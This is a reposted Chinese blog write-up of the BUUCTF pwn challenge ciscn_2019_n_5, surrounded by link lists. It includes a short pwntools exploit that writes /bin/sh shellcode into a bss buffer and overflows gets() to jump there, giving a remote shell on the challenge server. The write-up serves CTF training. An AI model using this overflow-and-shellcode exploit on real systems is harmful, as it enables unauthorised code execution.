Buuctf(pwn) ciscn_2019_n_5 - 代码天地

Buuctf(pwn) ciscn_2019_n_5

其他 2021-03-30 09:22:04 阅读次数: 0

在这里插入图片描述

发现name在全局变量bss段上

可以利用 gets() 进行溢出

from pwn import*
r=remote('node3.buuoj.cn',27785)
context(arch='amd64',os='linux')   说明版本架构
shellcode=asm(shellcraft.sh())     获取生成调用  bin/sh的 shellcode
r.sendlineafter('tell me your name',shellcode)   往name里面写入shellcode
payload='a'*0x28+p64(0x601080)
r.sendlineafter('What do you want to say to me?',payload)
r.interactive()

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115317208

Buuctf(pwn) ciscn_2019_n_5

【BUUCTF - PWN】ciscn_2019_n_1

【BUUCTF - PWN】ciscn_2019_n_8

Buuctf(pwn)ciscn_2019_n_8

[BUUCTF]PWN——ciscn_2019_ne_5

ciscn_2019_n_5

【BUUCTF - PWN】PWN5

buuctf pwn（5~8）

【BUUCTF - PWN】ciscn_2019_c_1

【BUUCTF - PWN】ciscn_2019_en_2

[BUUCTF]PWN——ciscn_2019_final_2

Buuctf(PWN)ciscn_2019_c_1

[BUUCTF-pwn]——ciscn_2019_c_1

[BUUCTF]PWN——ciscn_2019_final_3（tcache dup）

[BUUCTF]PWN——[第五空间2019 决赛]PWN5

BUUCTF-PWN ciscn_2019_final_5（临界条件错误，劫持GOT表项）

[BUUCTF-pwn]——[OGeek2019]babyrop

Buuctf(pwn)[OGeek2019]babyrop

pwn BUUCTF第五空间决赛pwn5

[BUUCTF]PWN——jarvisoj_level5

BUUCTF ciscn_2019_n_8

buuctf ciscn_2019_n_3

BUUCTF ciscn_2019_ne_5

buuctf ciscn_2019_sw_5

BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2

buuctf-pwn刷题-axb_2019_heap

BUUCTF(pwn)[HarekazeCTF2019]baby_rop

[BUUCTF]PWN——[HarekazeCTF2019]baby_rop

BUUCTF-PWN刷题记录-5（Tcache）

&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

[编程题]学英语

[codeforces 1288A] Deadline 约数+模

Python的web开发

Docker在Centos 7上的部署

python编码

解决Ubuntu16.04 fatal error: json/json.h: No such file or directory

mysql并发插入

rest接口如何适应jsonp的方案

linux 终端上网设置

高数——等号两边同时求导、积分的解释

每日归档

更多

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)